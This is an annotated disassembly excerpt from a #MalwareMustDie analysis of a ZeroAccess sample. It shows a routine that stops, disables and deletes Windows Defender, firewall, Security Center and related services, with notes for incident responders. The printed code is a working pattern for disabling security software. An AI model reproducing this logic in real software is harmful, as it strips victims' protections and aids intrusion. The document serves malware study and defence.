// #MalwareMustDie! Case contants.exe ZeroAccess RECYCLER
// Case: http://malwaremustdie.blogspot.jp/2013/02/blackhole-of-closest-version-with.html
//
// IDA disassembly excerpts (x86-32, stdcall Win32 API calls; IDA comments after ';').
// In the .text PE section the sample stops, DISABLES (start type = SERVICE_DISABLED)
// and DELETES the following Windows services - it is a security-service killer,
// not a "process closer":
//   MsMpSvc, windefend, SharedAccess, iphlpsvc, wscsvc, mpssvc, bfe
// (anti-malware, firewall / ICS, IP Helper, Security Center and Base Filtering
// Engine services). The SCM is opened with SC_MANAGER_ALL_ACCESS, so the routine
// only has effect when the sample runs with administrative rights; if that open
// fails the whole service-tampering block is skipped (jz loc_40274B below).
// IR note: because DeleteService is used, recovery is not just "set start type
// back to automatic" - the service registrations themselves must be restored.
// @unixfreaxjp /malware]$ date | Wed Feb 6 15:53:41 JST 2013
//
// DisableThreadLibraryCalls lets a DLL opt out of the DLL_THREAD_ATTACH /
// DLL_THREAD_DETACH notifications. hLibModule is presumably the module's own
// handle, so this is most likely the DLL_PROCESS_ATTACH path of DllMain
// (the enclosing function starts above this excerpt - not shown).
// The result of sub_4016D1 (not shown) decides whether execution continues.
0x4017FB push [ebp+hLibModule] ; hLibModule
0x4017FE call ds:DisableThreadLibraryCalls
0x401804 call sub_4016D1
0x401809 test eax, eax
0x40180B jz short loc_401832
// Registry step (excerpt of sub_402634; the ZwOpenKey arguments, i.e. which key
// is opened, lie above this range and are not shown). On success one value is
// deleted and the key closed. IDA renders the value-name operand asc_41D0DC as
// " \"", which looks like a UNICODE_STRING mis-typed as ASCII - verify it in the
// data segment before quoting it as an indicator.
0x402659 call ds:ZwOpenKey
0x40265F test eax, eax ; NTSTATUS: negative = failure
0x402661 jl short loc_40267A
0x402663 push offset asc_41D0DC ; " \"" (value name - see note above)
0x402668 push [ebp+hSCObject] ; key handle (same stack slot later holds the SCM handle)
0x40266B call ds:ZwDeleteValueKey
0x402671 push [ebp+hSCObject]
0x402674 call ds:ZwClose
// Connect to the Service Control Manager with full access
// (0xF003F = SC_MANAGER_ALL_ACCESS). Fails for non-admin callers.
0x40267A loc_40267A: ; CODE XREF: sub_402634+2Dj
0x40267A push 0F003Fh ; dwDesiredAccess = SC_MANAGER_ALL_ACCESS
0x40267F push 0 ; lpDatabaseName = NULL (active services database)
0x402681 push 0 ; lpMachineName = NULL (local machine)
0x402683 call ds:OpenSCManagerW ; Establish a connection to the service
; control manager on the specified computer
; and opens the specified database
0x402689 mov [ebp+hSCObject], eax
0x40268C test eax, eax
0x40268E jz loc_40274B ; no SCM handle -> skip all service tampering
0x402694 push ebx
0x402695 push esi
0x402696 push edi
// Each target service is opened with SERVICE_ALL_ACCESS (0xF01FF) and, if the
// open succeeds, its handle is passed to sub_4024E2 in esi (register-passed
// argument, not stdcall). A failed OpenServiceW (service absent on this OS
// version, or access denied) is silently skipped and the next name is tried;
// nothing aborts the sequence.
0x402697 mov edi, ds:OpenServiceW
0x40269D mov ebx, 0F01FFh ; SERVICE_ALL_ACCESS, reused for every OpenServiceW
0x4026A2 push ebx ; dwDesiredAccess
0x4026A3 push offset ServiceName ; "MsMpSvc"
0x4026A8 push eax ; hSCManager (still in eax from OpenSCManagerW)
0x4026A9 call edi ; OpenServiceW
0x4026AB test eax, eax
0x4026AD jz short loc_4026B6
0x4026AF mov esi, eax
0x4026B1 call sub_4024E2 ; stop / disable / delete
// service "windefend"
0x4026B6 loc_4026B6: ; CODE XREF: sub_402634+79j
0x4026B6 push ebx ; dwDesiredAccess
0x4026B7 push offset aWindefend ; "windefend"
0x4026BC push [ebp+hSCObject] ; hSCManager
0x4026BF call edi ; OpenServiceW
0x4026C1 test eax, eax
0x4026C3 jz short loc_4026CC
0x4026C5 mov esi, eax
0x4026C7 call sub_4024E2
// service "SharedAccess"
0x4026CC loc_4026CC: ; CODE XREF: sub_402634+8Fj
0x4026CC push ebx ; dwDesiredAccess
0x4026CD push offset aSharedaccess ; "SharedAccess"
0x4026D2 push [ebp+hSCObject] ; hSCManager
0x4026D5 call edi ; OpenServiceW
0x4026D7 test eax, eax
0x4026D9 jz short loc_4026E2
0x4026DB mov esi, eax
0x4026DD call sub_4024E2
0x4026E2 // service "iphlpsvc"
0x4026E2 loc_4026E2: ; CODE XREF: sub_402634+A5j
0x4026E2 push ebx ; dwDesiredAccess
0x4026E3 push offset aIphlpsvc ; "iphlpsvc"
0x4026E8 push [ebp+hSCObject] ; hSCManager
0x4026EB call edi ; OpenServiceW
0x4026ED test eax, eax
0x4026EF jz short loc_4026F8
0x4026F1 mov esi, eax
0x4026F3 call sub_4024E2
0x4026F8 // service "wscsvc"
0x4026F8 loc_4026F8: ; CODE XREF: sub_402634+BBj
0x4026F8 push ebx ; dwDesiredAccess
0x4026F9 push offset aWscsvc ; "wscsvc"
0x4026FE push [ebp+hSCObject] ; hSCManager
0x402701 call edi ; OpenServiceW
0x402703 test eax, eax
0x402705 jz short loc_40270E
0x402707 mov esi, eax
0x402709 call sub_4024E2
0x40270E // service "mpssvc"
0x40270E loc_40270E: ; CODE XREF: sub_402634+D1j
0x40270E push ebx ; dwDesiredAccess
0x40270F push offset aMpssvc ; "mpssvc"
0x402714 push [ebp+hSCObject] ; hSCManager
0x402717 call edi ; OpenServiceW
0x402719 test eax, eax
0x40271B jz short loc_402724
0x40271D mov esi, eax
0x40271F call sub_4024E2
0x402724 // service "bfe"
0x402724 loc_402724: ; CODE XREF: sub_402634+E7j
0x402724 push ebx ; dwDesiredAccess
0x402725 push offset aBfe ; "bfe"
0x40272A push [ebp+hSCObject] ; hSCManager
0x40272D call edi ; OpenServiceW
0x40272F test eax, eax
0x402731 jz short loc_40273A
0x402733 mov esi, eax
0x402735 call sub_4024E2
0x40273A // Release the SCM handle and restore callee-saved registers.
// sub_402593 (not shown) runs afterwards; the function continues past this excerpt.
0x40273A loc_40273A: ; CODE XREF: sub_402634+FDj
0x40273A push [ebp+hSCObject] ; hSCObject
0x40273D call ds:CloseServiceHandle
0x402743 call sub_402593
0x402748 pop edi
0x402749 pop esi
0x40274A pop ebx
;-----------------------------------------------------------------------
; sub_4024E2 - stop, disable and delete ONE service.
; In:    esi = hService (opened by the caller with SERVICE_ALL_ACCESS)
; Out:   eax = whatever CloseServiceHandle returned (callers ignore it)
; Stack: 0x1C bytes for a SERVICE_STATUS local; edi is saved/restored
; Steps: 1. ControlService(SERVICE_CONTROL_STOP), retried up to 4 times
;           one second apart while the service reports
;           ERROR_SERVICE_CANNOT_ACCEPT_CTRL (0x41B); any other error
;           ends the loop immediately.
;        2. ChangeServiceConfigW -> start type SERVICE_DISABLED
;           (survives reboot even if the delete fails).
;        3. DeleteService, then CloseServiceHandle.
;        None of the results after the stop loop are checked.
;-----------------------------------------------------------------------
0x4024E2 sub_4024E2 proc near
0x4024E2
0x4024E2 ServiceStatus = _SERVICE_STATUS ptr -1Ch
0x4024E2
0x4024E2 sub esp, 1Ch ; room for SERVICE_STATUS
0x4024E5 push edi
0x4024E6 push 4
0x4024E8 pop edi ; edi = remaining stop attempts (4)
0x4024E9 // stop loop
0x4024E9 loc_4024E9:
0x4024E9 lea eax, [esp+20h+ServiceStatus]
0x4024ED push eax ; lpServiceStatus
0x4024EE push 1 ; dwControl = SERVICE_CONTROL_STOP
0x4024F0 push esi ; hService
0x4024F1 call ds:ControlService ; send the stop control code to the service
0x4024F7 test eax, eax
0x4024F9 jnz short loc_402516 ; stop accepted -> go disable/delete
0x4024FB call ds:GetLastError
0x402501 cmp eax, 41Bh ; ERROR_SERVICE_CANNOT_ACCEPT_CTRL (service busy / in transition)
0x402506 jnz short loc_402516 ; any other error: stop retrying, still disable/delete
0x402508 push 3E8h ; dwMilliseconds = 1000
0x40250D call ds:Sleep
0x402513 dec edi
0x402514 jnz short loc_4024E9 ; retry; at most 4 attempts in total
0x402516
0x402516 loc_402516:
0x402516 xor eax, eax ; 0 / NULL for every optional parameter below
0x402518 push eax ; lpDisplayName = NULL (unchanged)
0x402519 push eax ; lpPassword = NULL
0x40251A push eax ; lpServiceStartName = NULL
0x40251B push eax ; lpDependencies = NULL
0x40251C push eax ; lpdwTagId = NULL
0x40251D push eax ; lpLoadOrderGroup = NULL
0x40251E push eax ; lpBinaryPathName = NULL (unchanged)
0x40251F push eax ; dwErrorControl = 0 (SERVICE_ERROR_IGNORE)
0x402520 push 4 ; dwStartType = SERVICE_DISABLED
0x402522 push 20h ; dwServiceType = SERVICE_WIN32_SHARE_PROCESS
0x402524 push esi ; hService
// Disable so the service does not come back after reboot, then remove it.
// Return values are not checked.
0x402525 call ds:ChangeServiceConfigW ; sets start type to SERVICE_DISABLED
0x40252B push esi ; hService
0x40252C call ds:DeleteService ; marks the service for deletion from the SCM database
0x402532 push esi ; hService (service handle, not the SCM handle)
0x402533 call ds:CloseServiceHandle
0x402539 pop edi
0x40253A add esp, 1Ch
0x40253D retn
0x40253D sub_4024E2 endp
--- #MalwareMustDie